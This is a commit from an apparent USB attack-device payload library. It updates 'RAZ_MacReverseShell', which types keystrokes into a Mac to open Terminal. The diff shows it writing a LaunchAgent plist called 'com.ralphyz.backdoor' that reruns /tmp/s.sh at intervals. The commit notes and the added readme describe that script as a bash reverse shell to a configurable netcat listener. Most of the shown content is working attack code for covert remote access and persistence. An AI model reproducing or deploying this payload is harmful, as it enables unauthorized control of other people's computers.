Updated payloads for fw v1.1 (#176)

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Fixed additional MacReverseShell

* Added readme.md files

* Added readme.md files

* Added readme.md

* Added readme.md files

* Added readme.md files

* Updated for firmware 1.1

* Updated for firmware 1.1

* Added ThemeChanger and updated for firmware 1.1

* Updated readme.md

* Updated for firmware 1.1 - using RUN command

* Fixed issues with the new RUN - reverted

* Fixed a few script problems

* removed binary and updated readme.md

* added a check for themepack

* edited themechanger readme

* updated readme.md and version

payloads/library/remote_access/RAZ_MacReverseShell/payload.txt

@@ -2,7 +2,7 @@
 #
 # Title:         RAZ_MacReverseShell
 # Author:        RalphyZ
-# Version:       1.1
+# Version:       1.2
 # Target:        Mac OSX
 # Dependencies:  None
 #
@@ -12,8 +12,14 @@
 #                user-defined interval
 #
 # Colors:
-# Green (blinking)..........Working
-# White.....................Completed without error
+# | Status     | Color                         | Description                                      |
+# | ---------- | ------------------------------| ------------------------------------------------ |
+# | SETUP      | Magenta solid                 | Setting attack mode, getting the switch position | 
+# | ATTACK     | Yellow single blink           | Running the VBScript                             | 
+# | FINISH     | Green blink followed by SOLID | Script is finished                               | 
+
+#Magenta solid
+LED SETUP
 
 # Edit this to point to the  NetCat Listener
 LISTENER_IP="192.168.1.100"
@@ -24,15 +30,15 @@ FREQUENCY="60"
 
 #----Proceed with Caution------------------------------------------------------
 
-# Green blinking LED
-LED G 100
-
 # Human Interface Device
 ATTACKMODE HID
 
 # Emulate the Ducky - QUACK!
 QUACK DEFAULT_DELAY 300
 
+# Start the attack - yellow single blink
+LED ATTACK
+
 # Start the Mac Terminal
 QUACK COMMAND SPACE
 QUACK STRING terminal
@@ -53,7 +59,7 @@ QUACK ENTER
 QUACK DELAY 500
 
 # Add to the Launch Agents
-QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\\n    \<dict\>\\n    \<key\>Label\</key\>\\n        \<string\>com.ralphyz.backdoor\</string\>\\n    \<key\>ProgramArguments\</key\>\\n    \<array\>\\n        \<string\>/bin/sh\</string\>\\n        \<string\>/tmp/s.sh\</string\>\\n    \</array\>\\n    \<key\>RunAtLoad\</key\>\\n        \<true/\>\\n    \<key\>StartInterval\</key\>\\n        \<integer\>${FREQUENCY}\</integer\>\\n    \<key\>AbandonProcessGroup\</key\>\\n        \<true/\>\\n    \</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
+QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\<dict\>\<key\>Label\</key\>\<string\>com.ralphyz.backdoor\</string\>\<key\>ProgramArguments\</key\>\<array\>\<string\>/bin/sh\</string\>\<string\>/tmp/s.sh\</string\>\</array\>\<key\>RunAtLoad\</key\>\<true/\>\<key\>StartInterval\</key\>\<integer\>${FREQUENCY}\</integer\>\<key\>AbandonProcessGroup\</key\>\<true/\>\</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
 QUACK ENTER
 QUACK DELAY 500
 
@@ -64,5 +70,6 @@ QUACK ENTER
 # Close the Terminal Window
 QUACK COMMAND q
 
-# White LED for finished
-LED R G B
+# Green 1000ms VERYFAST blink followed by SOLID
+LED FINISH
+exit 0

payloads/library/remote_access/RAZ_MacReverseShell/readme.md

@@ -0,0 +1,39 @@
+# RAZ_MacReverseShell
+* Author: RalphyZ 
+* Version: Version 1.1.1
+* Target: Mac OSX
+* Category: Reverse Shell
+* Attackmode: HID
+
+## Change Log
+| Version | Changes                                  |
+| ------- | ---------------------------------------- |
+| 1.1.1   | Updated for firmware 1.1.1               |
+| 1.1     | Added variables for easier customization |
+| 1.0     | Initial release                          |
+
+## Dependencies
+None
+ 
+## Description
+Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, /tmp/s.sh.  It then adds the script to the Launch Agent - establishing persistence - running at startup
+
+## Configuration
+Set the location of your listener:
+
+LISTENER_IP="192.168.1.100"
+
+LISTENER_PORT="4444"
+
+
+Set the frequency you want the script to run (in minutes)
+
+FREQUENCY="60"
+
+## Colors
+| Status    | Color                         | Description                                      |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP     | Magenta solid                 | Setting attack mode, getting the switch position | 
+| ATTACK    | Yellow single blink           | Running the VBScript                             | 
+| FINISH    | Green blink followed by SOLID | Script is finished                               | 
+